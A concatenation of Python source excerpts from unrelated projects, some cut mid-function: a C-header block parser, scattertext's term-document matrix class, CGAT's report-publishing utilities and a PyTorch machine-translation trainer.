blocksToKeep.extend(blocksInProgress)
else:
# Only keep the directives found.
blocksToKeep.extend(blocksOfDirectives)
lastTerminatorIndex = i + 1
blocksInProgress = []
blocksOfDirectives = []
state = NORMAL
ident = ""
state_token = ""
i += 1
if lastTerminatorIndex < numTokens:
blocksInProgress.append(Block(block.tokens[lastTerminatorIndex:numTokens]))
if len(blocksInProgress) > 0:
blocksToKeep.extend(blocksInProgress)
self.blocks = blocksToKeep
def replaceTokens(self, replacements):
"""Replace tokens according to the given dict."""
extra_includes = []
for b in self.blocks:
made_change = False
if b.isInclude() is None:
i = 0
while i < len(b.tokens):
tok = b.tokens[i]
if (tok.kind == TokenKind.KEYWORD and tok.id == 'struct'
and (i + 2) < len(b.tokens) and b.tokens[i + 2].id == '{'):
struct_name = b.tokens[i + 1].id
if struct_name in kernel_struct_replacements:
extra_includes.append("<bits/%s.h>" % struct_name)
end = i + 2
while end < len(b.tokens) and b.tokens[end].id != '}':
end += 1
end += 1 # Swallow '}'
while end < len(b.tokens) and b.tokens[end].id != ';':
end += 1
end += 1 # Swallow ';'
# Remove these tokens. We'll replace them later with a #include block.
b.tokens[i:end] = []
made_change = True
# We've just modified b.tokens, so revisit the current offset.
continue
if tok.kind == TokenKind.IDENTIFIER:
if tok.id in replacements:
tok.id = replacements[tok.id]
made_change = True
i += 1
if b.isDefine() and b.define_id in replacements:
b.define_id = replacements[b.define_id]
made_change = True
if made_change and b.isIf():
# Keep 'expr' in sync with 'tokens'.
b.expr = CppExpr(b.tokens)
for extra_include in extra_includes:
replacement = CppStringTokenizer(extra_include)
self.blocks.insert(2, Block(replacement.tokens, directive='include'))
def strip_space(s):
"""Strip out redundant space in a given string."""
# NOTE: It ought to be more clever to not destroy spaces in string tokens.
replacements = {' . ': '.',
' [': '[',
'[ ': '[',
' ]': ']',
'( ': '(',
' )': ')',
' ,': ',',
'# ': '#',
' ;': ';',
'~ ': '~',
' -> ': '->'}
result = s
for r in replacements:
result = result.replace(r, replacements[r])
# Remove the space between function name and the parenthesis.
result = re.sub(r'(\w+) \(', r'\1(', result)
return result
class BlockParser(object):
"""A class that converts an input source file into a BlockList object."""
def __init__(self, tokzer=None):
"""Initialize a block parser.
The input source is provided through a Tokenizer object.
"""
self._tokzer = tokzer
self._parsed = False
@property
def parsed(self):
return self._parsed
@staticmethod
def _short_extent(extent):
return '%d:%d - %d:%d' % (extent.start.line, extent.start.column,
extent.end.line, extent.end.column)
def getBlocks(self, tokzer=None):
"""Return all the blocks parsed."""
def consume_extent(i, tokens, extent=None, detect_change=False):
"""Return tokens that belong to the given extent.
It parses all the tokens that follow tokens[i], until getting out
of the extent. When detect_change is True, it may terminate early
when detecting preprocessing directives inside the extent.
"""
result = []
if extent is None:
extent = tokens[i].cursor.extent
while i < len(tokens) and tokens[i].location in extent:
t = tokens[i]
if debugBlockParser:
print(' ' * 2, t.id, t.kind, t.cursor.kind)
if (detect_change and t.cursor.extent != extent and
t.cursor.kind == CursorKind.PREPROCESSING_DIRECTIVE):
break
result.append(t)
i += 1
return (i, result)
def consume_line(i, tokens):
"""Return tokens that follow tokens[i] in the same line."""
result = []
line = tokens[i].location.line
while i < len(tokens) and tokens[i].location.line == line:
if tokens[i].cursor.kind == CursorKind.PREPROCESSING_DIRECTIVE:
break
result.append(tokens[i])
i += 1
return (i, result)
if tokzer is None:
tokzer = self._tokzer
tokens = tokzer.tokens
blocks = []
buf = []
i = 0
while i < len(tokens):
t = tokens[i]
cursor = t.cursor
if debugBlockParser:
print ("%d: Processing [%s], kind=[%s], cursor=[%s], "
"extent=[%s]" % (t.location.line, t.spelling, t.kind,
cursor.kind,
self._short_extent(cursor.extent)))
if cursor.kind == CursorKind.PREPROCESSING_DIRECTIVE:
| |
<reponame>Anthonyive/scattertext
import collections
import re
import numpy as np
import pandas as pd
from scattertext.CSRMatrixTools import delete_columns, CSRMatrixFactory
from scattertext.FeatureOuput import FeatureLister
from scattertext.Common import SPACY_ENTITY_TAGS, MY_ENGLISH_STOP_WORDS, DEFAULT_BACKGROUND_SCALER_ALGO, \
DEFAULT_BACKGROUND_BETA
from scattertext.frequencyreaders.DefaultBackgroundFrequencies import DefaultBackgroundFrequencies
from scattertext.termranking import AbsoluteFrequencyRanker
from scattertext.termscoring import ScaledFScore
from scattertext.indexstore.IndexStore import IndexStore
class TermDocMatrixWithoutCategories(object):
def __init__(self, X, mX, term_idx_store, metadata_idx_store, unigram_frequency_path=None):
'''
Parameters
----------
X : csr_matrix
term document matrix
mX : csr_matrix
metadata-document matrix
term_idx_store : IndexStore
Term indices
metadata_idx_store : IndexStore
Document metadata indices
unigram_frequency_path : str or None
Path to term frequency file.
'''
self._X = X
self._mX = mX
self._term_idx_store = term_idx_store
self._metadata_idx_store = metadata_idx_store
self._unigram_frequency_path = unigram_frequency_path
self._background_corpus = None
self._strict_unigram_definition = True
def get_default_stoplist(self):
return MY_ENGLISH_STOP_WORDS
def allow_single_quotes_in_unigrams(self):
'''
Don't filter out single quotes in unigrams
:return: self
'''
self._strict_unigram_definition = False
return self
def compact(self, compactor, non_text=False):
'''
Compact term document matrix.
Parameters
----------
compactor : object
Object that takes a Term Doc Matrix as its first argument, and has a compact function which returns a
Term Doc Matrix like argument
non_text : bool
Use non text features. False by default.
Returns
-------
TermDocMatrix
'''
return compactor.compact(self, non_text)
def select(self, compactor, non_text=False):
'''
Same as compact
'''
return compactor.compact(self, non_text)
def get_num_terms(self):
'''
Returns
-------
The number of terms registered in the term doc matrix
'''
return len(self._term_idx_store)
def get_num_docs(self):
'''
Returns
-------
int, number of documents
'''
return self._X.shape[0]
def get_num_metadata(self):
'''
Returns
-------
int, number of unique metadata items
'''
return len(self.get_metadata())
def set_background_corpus(self, background):
'''
Parameters
----------
background
'''
if issubclass(type(background), TermDocMatrixWithoutCategories):
self._background_corpus = pd.DataFrame(background
.get_term_freq_df()
.sum(axis=1),
columns=['background']).reset_index()
self._background_corpus.columns = ['word', 'background']
elif (type(background) == pd.DataFrame
and set(background.columns) == set(['word', 'background'])):
self._background_corpus = background
else:
raise Exception('The argument named background must be a subclass of TermDocMatrix or a ' \
+ 'DataFrame with columns "word" and "background", where "word" ' \
+ 'is the term text, and "background" is its frequency.')
def get_background_corpus(self):
if self._background_corpus is not None:
return self._background_corpus
return DefaultBackgroundFrequencies.get_background_frequency_df(self._unigram_frequency_path)
def get_term_and_background_counts(self):
'''
Returns
-------
A pd.DataFrame consisting of unigram term counts of words occurring
in the TermDocumentMatrix and their corresponding background corpus
counts. The dataframe has two columns, corpus and background.
>>> corpus.get_unigram_corpus().get_term_and_background_counts()
corpus background
obama 702.0 565739.0
romney 570.0 695398.0
barack 248.0 227861.0
...
'''
background_df = self._get_background_unigram_frequencies()
corpus_freq_df = self.get_term_count_df()
corpus_unigram_freq = self._get_corpus_unigram_freq(corpus_freq_df)
df = corpus_unigram_freq.join(background_df, how='outer').fillna(0)
return df
def get_term_count_df(self):
return pd.DataFrame({'corpus': self._X.sum(axis=0).A1, 'term': self.get_terms()}).set_index('term')
def _get_corpus_unigram_freq(self, corpus_freq_df):
unigram_validator = re.compile('^[A-Za-z]+$')
corpus_unigram_freq = corpus_freq_df.loc[[term for term
in corpus_freq_df.index
if unigram_validator.match(term) is not None]]
return corpus_unigram_freq
def _get_background_unigram_frequencies(self):
if self.get_background_corpus() is not None:
return self.get_background_corpus()
return DefaultBackgroundFrequencies.get_background_frequency_df(self._unigram_frequency_path)
def list_extra_features(self):
'''
Returns
-------
List of dicts. One dict for each document, keys are metadata, values are counts
'''
return FeatureLister(self._mX,
self._metadata_idx_store,
self.get_num_docs()).output()
def get_terms(self):
'''
Returns
-------
np.array of unique terms
'''
return self._term_idx_store._i2val
def get_metadata(self):
'''
Returns
-------
np.array of unique metadata
'''
return self._metadata_idx_store._i2val
def get_total_unigram_count(self):
return self._get_unigram_term_freq_df().sum()
def _get_unigram_term_freq_df(self):
return self._get_corpus_unigram_freq(
# self.get_term_freq_df().sum(axis=1)
self.get_term_count_df()['corpus']
)
def _get_X_after_delete_terms(self, idx_to_delete_list, non_text=False):
new_term_idx_store = self._get_relevant_idx_store(non_text).batch_delete_idx(idx_to_delete_list)
new_X = delete_columns(self._get_relevant_X(non_text), idx_to_delete_list)
return new_X, new_term_idx_store
def _get_relevant_X(self, non_text):
return self._mX if non_text else self._X
def _get_relevant_idx_store(self, non_text):
return self._metadata_idx_store if non_text else self._term_idx_store
def remove_infrequent_words(self, minimum_term_count, term_ranker=AbsoluteFrequencyRanker):
'''
Returns
-------
A new TermDocumentMatrix consisting of only terms which occur at least minimum_term_count.
'''
tdf = term_ranker(self).get_ranks().sum(axis=1)
return self.remove_terms(list(tdf[tdf <= minimum_term_count].index))
def remove_entity_tags(self):
'''
Returns
-------
A new TermDocumentMatrix consisting of only terms in the current TermDocumentMatrix
that aren't spaCy entity tags.
Note: Used if entity types are censored using FeatsFromSpacyDoc(tag_types_to_censor=...).
'''
terms_to_remove = [term for term in self._term_idx_store._i2val
if any([word in SPACY_ENTITY_TAGS for word in term.split()])]
return self.remove_terms(terms_to_remove)
def remove_terms(self, terms, ignore_absences=False, non_text=False):
'''Non destructive term removal.
Parameters
----------
terms : list
list of terms to remove
ignore_absences : bool, False by default
If term does not appear, don't raise an error, just move on.
non_text : bool, False by default
Remove metadata terms instead of regular terms
Returns
-------
TermDocMatrix, new object with terms removed.
'''
idx_to_delete_list = self._build_term_index_list(ignore_absences, terms, non_text)
return self.remove_terms_by_indices(idx_to_delete_list, non_text)
def whitelist_terms(self, whitelist_terms):
'''
:param whitelist_terms: list[str], terms to whitelist
:return: TermDocMatrix, new object with only terms in parameter
'''
return self.remove_terms(list(set(self.get_terms()) - set(whitelist_terms)))
def _build_term_index_list(self, ignore_absences, terms, non_text=False):
idx_to_delete_list = []
my_term_idx_store = self._get_relevant_idx_store(non_text)
for term in terms:
if term not in my_term_idx_store:
if not ignore_absences:
raise KeyError('Term %s not found' % (term))
continue
idx_to_delete_list.append(my_term_idx_store.getidx(term))
return idx_to_delete_list
def _make_new_term_doc_matrix(self,
new_X=None,
new_mX=None,
new_y=None,
new_term_idx_store=None,
new_category_idx_store=None,
new_metadata_idx_store=None,
new_y_mask=None):
return TermDocMatrixWithoutCategories(
X=new_X if new_X is not None else self._X,
mX=new_mX if new_mX is not None else self._mX,
term_idx_store=new_term_idx_store if new_term_idx_store is not None else self._term_idx_store,
metadata_idx_store=new_metadata_idx_store if new_metadata_idx_store is not None else self._metadata_idx_store,
unigram_frequency_path=self._unigram_frequency_path
)
def remove_terms_used_in_less_than_num_docs(self, threshold, non_text=False):
'''
Parameters
----------
threshold: int
Minimum number of documents term should appear in to be kept
non_text: bool
Use non-text features instead of terms
Returns
-------
TermDocMatrix, new object with terms removed.
'''
term_counts = self._get_relevant_X(non_text).astype(bool).astype(int).sum(axis=0).A[0]
terms_to_remove = np.where(term_counts < threshold)[0]
return self.remove_terms_by_indices(terms_to_remove, non_text)
def remove_document_ids(self, document_ids, remove_unused_terms=True, remove_unused_metadata=False):
'''
:param document_ids: List[int], list of document ids to remove
:return: Corpus
'''
y_mask = ~np.isin(np.arange(self.get_num_docs()), np.array(document_ids))
updated_tdm = self._make_new_term_doc_matrix(
new_X=self._X,
new_mX=self._mX,
new_y=None,
new_category_idx_store=None,
new_term_idx_store=self._term_idx_store,
new_metadata_idx_store=self._metadata_idx_store,
new_y_mask=y_mask
)
if remove_unused_terms:
unused_term_idx = np.where(self._X[y_mask, :].sum(axis=0) == 0)[1]
updated_tdm = updated_tdm.remove_terms_by_indices(unused_term_idx, non_text=False)
if remove_unused_metadata:
unused_metadata_mask = np.mask(self._mX[y_mask, :].sum(axis=0) == 0)[0]
updated_tdm = updated_tdm.remove_terms_by_indices(unused_metadata_mask, non_text=True)
return updated_tdm
def remove_documents_less_than_length(self, max_length, non_text=False):
'''
`
:param max_length: int, length of document in terms registered in corpus
:return: Corpus
'''
tdm = self.get_metadata_doc_mat() if non_text else self.get_term_doc_mat()
doc_ids_to_remove = np.where(tdm.sum(axis=1).T.A1 < max_length)
return self.remove_document_ids(doc_ids_to_remove)
def get_unigram_corpus(self):
'''
Returns
-------
A new TermDocumentMatrix consisting of only unigrams in the current TermDocumentMatrix.
'''
terms_to_ignore = self._get_non_unigrams()
return self.remove_terms(terms_to_ignore)
def _get_non_unigrams(self):
return [term for term
in self._term_idx_store._i2val
if ' ' in term or (self._strict_unigram_definition and "'" in term)
]
def get_stoplisted_unigram_corpus(self, stoplist=None):
'''
Parameters
-------
stoplist : list, optional
Returns
-------
A new TermDocumentMatrix consisting of only unigrams in the current TermDocumentMatrix.
'''
if stoplist is None:
stoplist = self.get_default_stoplist()
else:
stoplist = [w.lower() for w in stoplist]
return self._remove_terms_from_list(stoplist)
def get_stoplisted_unigram_corpus_and_custom(self,
custom_stoplist):
'''
Parameters
-------
stoplist : list of lower-cased words, optional
Returns
-------
A new TermDocumentMatrix consisting of only unigrams in the current TermDocumentMatrix.
'''
if type(custom_stoplist) == str:
custom_stoplist = [custom_stoplist]
return self._remove_terms_from_list(set(self.get_default_stoplist())
| set(w.lower() for w in custom_stoplist))
def _remove_terms_from_list(self, stoplist):
terms_to_ignore = [term for term
in self._term_idx_store._i2val
if ' ' in term or (self._strict_unigram_definition
and ("'" in term or '’' in term))
or term in stoplist]
return self.remove_terms(terms_to_ignore)
def metadata_in_use(self):
'''
Returns True if metadata values are in term doc matrix.
Returns
-------
bool
'''
return len(self._metadata_idx_store) > 0
def _make_all_positive_data_ones(self, newX):
# type: (sparse_matrix) -> sparse_matrix
return (newX > 0).astype(np.int32)
def get_doc_lengths(self):
'''
Returns a list of document lengths in words
Returns
-------
np.array
'''
idx_to_delete_list = self._build_term_index_list(True, self._get_non_unigrams())
unigram_X, _ = self._get_X_after_delete_terms(idx_to_delete_list)
return unigram_X.sum(axis=1).A1
def remove_terms_by_indices(self, idx_to_delete_list, non_text=False):
'''
Parameters
----------
idx_to_delete_list, list
non_text, bool
Should we remove non text features or just terms?
Returns
-------
TermDocMatrix
'''
new_X, new_idx_store = self._get_X_after_delete_terms(idx_to_delete_list, non_text)
return self._make_new_term_doc_matrix(new_X=self._X if non_text else new_X,
new_mX=new_X if non_text else self._mX,
new_y=None,
new_category_idx_store=None,
new_term_idx_store=self._term_idx_store if non_text else new_idx_store,
new_metadata_idx_store=(new_idx_store if non_text
else self._metadata_idx_store),
new_y_mask=np.ones(new_X.shape[0]).astype(np.bool))
def get_scaled_f_scores_vs_background(self,
scaler_algo=DEFAULT_BACKGROUND_SCALER_ALGO,
beta=DEFAULT_BACKGROUND_BETA):
'''
Parameters
----------
scaler_algo : str
see get_scaled_f_scores, default 'none'
beta : float
default 1.
Returns
-------
pd.DataFrame of scaled_f_score scores compared to background corpus
'''
df = self.get_term_and_background_counts()
df['Scaled f-score'] = ScaledFScore.get_scores_for_category(
df['corpus'], df['background'], scaler_algo, beta
)
return df.sort_values(by='Scaled f-score', ascending=False)
def get_term_doc_mat(self):
'''
Returns sparse matrix representation of term-doc-matrix
Returns
-------
scipy.sparse.csr_matrix
'''
return self._X
def get_term_doc_mat_coo(self):
'''
Returns sparse matrix representation of term-doc-matrix
Returns
-------
scipy.sparse.coo_matrix
'''
return self._X.astype(np.double).tocoo()
def get_metadata_doc_mat(self):
'''
Returns sparse matrix representation of term-doc-matrix
Returns
-------
scipy.sparse.csr_matrix
'''
return self._mX
def term_doc_lists(self):
'''
Returns
-------
dict
'''
doc_ids = self._X.transpose().tolil().rows
terms = self._term_idx_store.values()
return dict(zip(terms, doc_ids))
def apply_ranker(self, term_ranker, use_non_text_features):
'''
Parameters
----------
term_ranker : TermRanker
Returns
-------
pd.Dataframe
'''
| |
'''Local.py - CGAT project specific functions
=============================================
The :mod:`Local` module contains various utility functions for working
on CGAT projects and are very specific to the CGAT directory layout.
.. note::
Methods in this module need to made to work with arbitrary project
layouts.
CGAT project layout
-------------------
The method :func:`isCGAT` checks if the code is executed within the
CGAT systems. The functions :func:`getProjectDirectories`,
:func:`getPipelineName`, :func:`getProjectId`, :func:`getProjectName`
provide information about the pipeline executed and the project context.
Publishing
-----------------
Once built, a report can be published by copying it to the publicly
visible directories on the CGAT systems. At the same time, references
to files on CGAT systems need to be replaced with links through the
public web interface. The functions :func:`getPublishDestinations` and
:func:`publish_report` implement this functionality.
The function :meth:`publish_tracks` builds a UCSC track hub and
moves it into the appropriate CGAT download directories.
Reference
---------
'''
import os
import re
import shutil
import inspect
import collections
import brewer2mpl
from CGATCore import Experiment as E
import CGATCore.IOTools as IOTools
from CGATCore.Pipeline.Parameters import loadParameters
PROJECT_ROOT = '/ifs/projects'
# Variables PARAMS and CONFIG will be set by Pipeline.py
# on import.
PARAMS = None
CONFIG = None
def isCGAT(curdir=None):
'''return True if this is a CGAT project.
This method works by checking if the current working directory
is part of :var:`PROJECT_ROOT`.
'''
if curdir is None:
curdir = os.path.abspath(os.getcwd())
return curdir.startswith(PROJECT_ROOT)
def getProjectDirectories(sections=None):
'''return directories relevant to this project.
The entries of the dictionary are:
webdir
Directory for publishing information (without password access).
exportdir
Directory for storing files to be exported alongside
the report.
notebookdir
Directory where project notebooks are located.
Arguments
---------
sections : list
If given, only the named sections are returned.
Returns
-------
directories : dict
Raises
------
ValueError
If any of the directories does not exist
'''
if not isCGAT():
raise ValueError(
"getProjectDirectories called for a non-CGAT project")
project_name = getProjectName()
result = {
'webdir': os.path.join(
PROJECT_ROOT, PARAMS["web_dir"]),
'exportdir': os.path.join(
PARAMS["exportdir"]),
'notebookdir': os.path.join(
PROJECT_ROOT, project_name, "notebooks")
}
if sections:
result = dict([(x, y) for x, y in list(result.items())
if x in sections])
for x, y in list(result.items()):
if not os.path.exists(y):
raise ValueError(
"directory %s for %s does not exist" % (y, x))
return result
def getPipelineName():
'''return the name of the pipeline.
The name of the pipeline is deduced by the name of the top-level
python script. The pipeline name is the name of the script
without any path information and the ``.py`` suffix.
Returns
-------
string
'''
# use the file attribute of the caller
for x in inspect.stack():
if x[0].f_globals["__name__"] == "__main__":
return os.path.basename(x[0].f_globals['__file__'])[:-3]
def getProjectId():
'''get the (obfuscated) project id based on the current working
directory.
The project is located by finding the ``web_dir`` configuration
variable and working backwards from that. ``web_dir`` should be
link to the web directory in the project directory which then
links to the web directory in the sftp directory which then links
to the obfuscated directory::
pipeline:web_dir
-> /ifs/projects/.../web
-> /ifs/sftp/.../web
-> /ifs/sftp/.../aoeuCATAa (obfuscated directory)
Returns
=======
string
'''
# return an id that has been explicitely set
if "report_project_url" in PARAMS:
return PARAMS["report_project_url"]
curdir = os.path.abspath(os.getcwd())
if not isCGAT(curdir):
raise ValueError(
"method getProjectId not called within %s" % PROJECT_ROOT)
webdir = PARAMS['web_dir']
if not os.path.islink(webdir):
raise ValueError(
"unknown configuration: webdir '%s' is not a link" % webdir)
target = os.readlink(webdir)
if not os.path.islink(target):
raise ValueError(
"unknown configuration: target '%s' is not a link" % target)
return os.path.basename(os.readlink(target))
def getProjectName():
'''cgat specific method: get the name of the project
based on the current working directory.
If called outside the Project hierarchy, the project name
will be set to the name of the current directory.
'''
curdir = os.path.abspath(os.getcwd())
if isCGAT(curdir):
prefixes = len(PROJECT_ROOT.split("/"))
return curdir.split("/")[prefixes]
else:
return os.path.basename(curdir)
def getPublishDestinations(prefix="", suffix=None):
"""cgat specific method : return path names of directories
for publishing.
Arguments
---------
prefix : string
Prefix to add to output directories.
suffix : suffix to add to output directories
Returns
-------
dest_report : string
Path for report to export
dest_export : string
Path for files to export
"""
if not prefix:
prefix = PARAMS.get("report_prefix", "default")
if prefix == "default":
prefix = getPipelineName() + "_"
if not suffix:
suffix = PARAMS.get("report_suffix", "")
dest_report = prefix + "report"
dest_export = prefix + "export"
if suffix is not None:
dest_report += suffix
dest_export += suffix
return dest_report, dest_export
def publish_report(prefix="",
patterns=[],
project_id=None,
prefix_project="/ifs/projects",
export_files=None,
suffix=None,
subdirs=False,
):
'''publish report into web directory.
Links export directory into web directory.
Copies html pages and fudges links to the pages in the
export directory.
If *prefix* is given, the directories will start with prefix,
otherwise, it is looked up from the option ``report_prefix``.
If report_prefix is "default", the prefix will be derived
from the pipeline name. For example, pipeline_intervals will
we copied to ``pipeline_intervals_report``.
*patterns* is an optional list of two-element tuples (<pattern>,
replacement_string). Each substitutions will be applied on each
file ending in .html.
If *project_id* is not given, it will be looked up. This requires
that this method is called within a subdirectory of PROJECT_ROOT.
*export_files* is a dictionary of files to be exported. The key
of the dictionary denotes the targetdirectory within the web
directory. The values in the dictionary are the files to be
linked to in the direcotry. For example::
exportfiles = {
"bamfiles" : glob.glob( "*/*.bam" ) + glob.glob( "*/*.bam.bai" ),
"bigwigfiles" : glob.glob( "*/*.bw" ),
}
.. note::
This function is CGAT specific.
'''
dest_report, dest_export = getPublishDestinations(prefix, suffix)
web_dir = PARAMS["web_dir"]
if project_id is None:
project_id = getProjectId()
src_export = os.path.abspath("export")
curdir = os.path.abspath(os.getcwd())
# substitute links to export and report
base_url = "http://www.cgat.org/downloads/%s" % project_id
_patterns = [
# redirect export directory
(re.compile(src_export),
"%(base_url)s/%(dest_export)s" % locals()),
# redirect report directory
(re.compile(curdir),
"%(base_url)s/%(dest_report)s" % locals()),
(re.compile('(%s)/_static' %
curdir),
"%(base_url)s/%(dest_report)s/_static" % locals())]
_patterns.extend(patterns)
# add intersphinx mapping - this requires that the name
# for the interpshinx redirection (key) corresponds to the
# export location with an appended "_report".
if CONFIG.has_section("intersphinx"):
for key, value in CONFIG.items("intersphinx"):
_patterns.append((
re.compile(os.path.abspath(value)),
"%(base_url)s/%(key)s_report" % locals()))
# check if the target exists in download location
intersphinx_target = os.path.join(
web_dir, key + "_report", "objects.inv")
if not os.path.exists(intersphinx_target):
E.warn("intersphinx mapping for '%s' does not exist at %s" %
(key, intersphinx_target))
def _link(src, dest):
'''create links.
Only link to existing targets.
'''
if os.path.exists(dest):
os.remove(dest)
if not os.path.exists(src):
E.warn("%s does not exist - skipped" % src)
return
# IMS: check if base path of dest exists. This allows for
# prefix to be a nested path structure e.g. project_id/
if not os.path.exists(os.path.dirname(os.path.abspath(dest))):
E.info('creating directory %s' %
os.path.dirname(os.path.abspath(dest)))
os.mkdir(os.path.dirname(os.path.abspath(dest)))
os.symlink(os.path.abspath(src), dest)
def _copy(src, dest):
if os.path.exists(dest):
shutil.rmtree(dest)
if not os.path.exists(src):
E.warn("%s does not exist - skipped" % src)
return
shutil.copytree(os.path.abspath(src), dest)
# publish export dir via symlinking
E.info("linking export directory in %s" % dest_export)
_link(src_export,
os.path.abspath(os.path.join(web_dir, dest_export)))
# publish web pages by copying
E.info("publishing web pages in %s" %
os.path.abspath(os.path.join(web_dir, dest_report)))
_copy(os.path.abspath("report/html"),
os.path.abspath(os.path.join(web_dir, dest_report)))
for root, dirs, files in os.walk(os.path.join(web_dir, dest_report)):
for f in files:
fn = os.path.join(root, f)
if fn.endswith(".html"):
with open(fn) as inf:
data = inf.read()
for rx, repl in _patterns:
data = rx.sub(repl, data)
outf = open(fn, "w")
outf.write(data)
outf.close()
if export_files:
bigwigs, bams, beds = [], [], []
for targetdir, filenames in list(export_files.items()):
targetdir = os.path.join(web_dir, targetdir)
if not os.path.exists(targetdir):
os.makedirs(targetdir)
for src in filenames:
dest = os.path.join(targetdir, os.path.basename(src))
if dest.endswith(".bam"):
bams.append((targetdir, dest))
elif dest.endswith(".bw"):
bigwigs.append((targetdir, dest))
elif dest.endswith(".bed.gz"):
beds.append((targetdir, dest))
dest = os.path.abspath(dest)
if not os.path.exists(dest):
try:
os.symlink(os.path.abspath(src), dest)
except OSError as msg:
E.warn("could not create symlink from %s to %s: %s" %
(os.path.abspath(src), dest, msg))
# output ucsc links
with open("urls.txt", "w") as outfile:
for targetdir, fn in bams:
filename = os.path.basename(fn)
track = filename[:-len(".bam")]
outfile.write(
"""track type=bam name="%(track)s" bigDataUrl=http://www.cgat.org/downloads/%(project_id)s/%(targetdir)s/%(filename)s\n""" % locals())
for targetdir, fn in bigwigs:
filename = os.path.basename(fn)
track = filename[:-len(".bw")]
outfile.write(
"""track type=bigWig name="%(track)s" bigDataUrl=http://www.cgat.org/downloads/%(project_id)s/%(targetdir)s/%(filename)s\n""" % locals())
for targetdir, fn in beds:
filename = os.path.basename(fn)
track = filename[:-len(".bed.gz")]
outfile.write(
"""http://www.cgat.org/downloads/%(project_id)s/%(targetdir)s/%(filename)s\n""" % locals())
E.info("UCSC urls are in urls.txt")
E.info(
"report has been published at http://www.cgat.org/downloads/%(project_id)s/%(dest_report)s" % locals())
def publish_tracks(export_files,
prefix="",
project_id=None,
project_name=None,
UCSC_ini=None):
| |
<reponame>dksifoua/NMT<filename>nmt/train/trainer.py
import os
import tqdm
import numpy as np
import matplotlib.pyplot as plt
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchtext.data import Dataset, Field
from torchtext.data.metrics import bleu_score
from torchtext.data.iterator import BucketIterator
from nmt.config.global_config import GlobalConfig
from nmt.config.train_config import TrainConfig
from nmt.train.train_utils import accuracy, adjust_lr, adjust_tf, AverageMeter, clip_gradient, load, save
from nmt.train.optim_utils import LRFinder
from nmt.train.beam_utils import find_best_path, Node
from nmt.utils.logger import Logger
from typing import Optional
class Trainer:
"""
Training routines.
Args:
model: nn.Module
The wrapped model.
optimizer: Optional[optim.Optimizer]
The wrapped optimizer. Can be None for evaluation and inference phases.
criterion: Optional[nn.Module]
The wrapped loss function. Can be None for evaluation and inference phases.
train_data: Dataset
Train dataset.
valid_data: Dataset
Valid dataset.
test_data: Dataset
Test dataset.
"""
def __init__(self, model: nn.Module, optimizer: Optional[optim.Optimizer], criterion: Optional[nn.Module], src_field: Field,
dest_field: Field, train_data: Dataset, valid_data: Dataset, test_data: Dataset, logger: Logger):
self.model = model
self.optimizer = optimizer
self.criterion = criterion
self.src_field = src_field
self.dest_field = dest_field
self.train_data = train_data
self.valid_data = valid_data
self.test_data = test_data
self.logger = logger
self.train_iterator = None
self.valid_iterator = None
self.test_iterator = None
def build_data_iterator(self, batch_size: int, device: torch.device):
"""
Build data iterators for the training.
Args:
batch_size (int): the batch size.
device (torch.device): the device on which the training will process.
"""
self.train_iterator, self.valid_iterator, self.test_iterator = BucketIterator.splits(
(self.train_data, self.valid_data, self.test_data),
batch_size=batch_size,
sort_key=lambda x: len(x.src),
sort_within_batch=True,
device=device
)
def lr_finder(self, model_name: str):
"""
Find the best learning rate for training process.
Args:
model_name:
The class name of the model.
"""
lr_finder = LRFinder(model=self.model, optimizer=self.optimizer, criterion=self.criterion, logger=self.logger,
grad_clip=TrainConfig.GRAD_CLIP)
lr_finder.range_test(data_loader=self.train_iterator, end_lr=TrainConfig.END_LR, n_iters=TrainConfig.N_ITERS)
fig = plt.figure(figsize=(15, 5))
ax = fig.add_subplot(1, 1, 1)
ax, lr = lr_finder.plot(ax=ax)
plt.savefig(os.path.join(GlobalConfig.IMG_PATH, f'SuggestedLR_{model_name}.png'))
plt.show()
if lr is not None: # Create an optimizer with the suggested LR
self.optimizer = optim.RMSprop(params=self.model.parameters(), lr=lr)
def load_model_optimizer_weights(self):
last_improvement = 0
if f'Best_{self.model.__class__.__name__}.pth' in os.listdir(GlobalConfig.CHECKPOINT_PATH):
model_state_dict, optim_state_dict, last_improvement = load(self.model.__class__.__name__)
self.model.load_state_dict(model_state_dict)
if self.optimizer is not None:
self.optimizer.load_state_dict(optim_state_dict)
self.logger.info('The model is loaded!')
return last_improvement
def train_step(self, epoch: int, grad_clip: float, tf_ratio: float):
"""
Train the model on a batch.
Args:
epoch (int): the epoch number.
grad_clip (float): the value beyond which we clip gradients in order avoid exploding gradients.
tf_ratio (float): the teacher forcing ratio. Must be in [0, 1.0]
Returns:
loss (float): the validation loss.
acc (float): the validation top-5 accuracy.
"""
loss_tracker, acc_tracker = AverageMeter(), AverageMeter()
self.model.train()
progress_bar = tqdm.tqdm(enumerate(self.train_iterator), total=len(self.train_iterator))
for i, data in progress_bar:
# Forward prop.
logits, sorted_dest_sequences, sorted_decode_lengths, sorted_indices = self.model(*data.src, *data.dest,
tf_ratio=tf_ratio)
# Since we decoded starting with <sos>, the targets are all words after <sos>, up to <eos>
sorted_dest_sequences = sorted_dest_sequences[1:, :]
# Remove paddings
logits = nn.utils.rnn.pack_padded_sequence(logits, sorted_decode_lengths).data
sorted_dest_sequences = nn.utils.rnn.pack_padded_sequence(sorted_dest_sequences, sorted_decode_lengths).data
# Calculate loss
loss = self.criterion(logits, sorted_dest_sequences)
# Back prop.
self.optimizer.zero_grad()
loss.backward()
# Clip gradients
if grad_clip is not None:
clip_gradient(self.optimizer, grad_clip)
# Update weights
self.optimizer.step()
# Track metrics
loss_tracker.update(loss.item(), sum(sorted_decode_lengths))
acc_tracker.update(accuracy(logits, sorted_dest_sequences, top_k=5), sum(sorted_decode_lengths))
# Update progressbar description
progress_bar.set_description(
f'Epoch: {epoch + 1:03d} - loss: {loss_tracker.average:.3f} - acc: {acc_tracker.average:.3f}%')
return loss_tracker.average, acc_tracker.average
def validate(self, epoch: int):
"""
Validate the model on a batch.
Args:
epoch: int
The epoch number.
Returns:
loss: float
The validation loss.
acc: float
The validation top-5 accuracy.
bleu-4: float
The validation BLEU score.
"""
references, hypotheses = [], []
loss_tracker, acc_tracker = AverageMeter(), AverageMeter()
self.model.eval()
with torch.no_grad():
progress_bar = tqdm.tqdm(enumerate(self.valid_iterator), total=len(self.valid_iterator))
for i, data in progress_bar:
# Forward prop.
logits, sorted_dest_sequences, sorted_decode_lengths, sorted_indices = self.model(*data.src, *data.dest,
tf_ratio=0.)
# Since we decoded starting with <sos>, the targets are all words after <sos>, up to <eos>
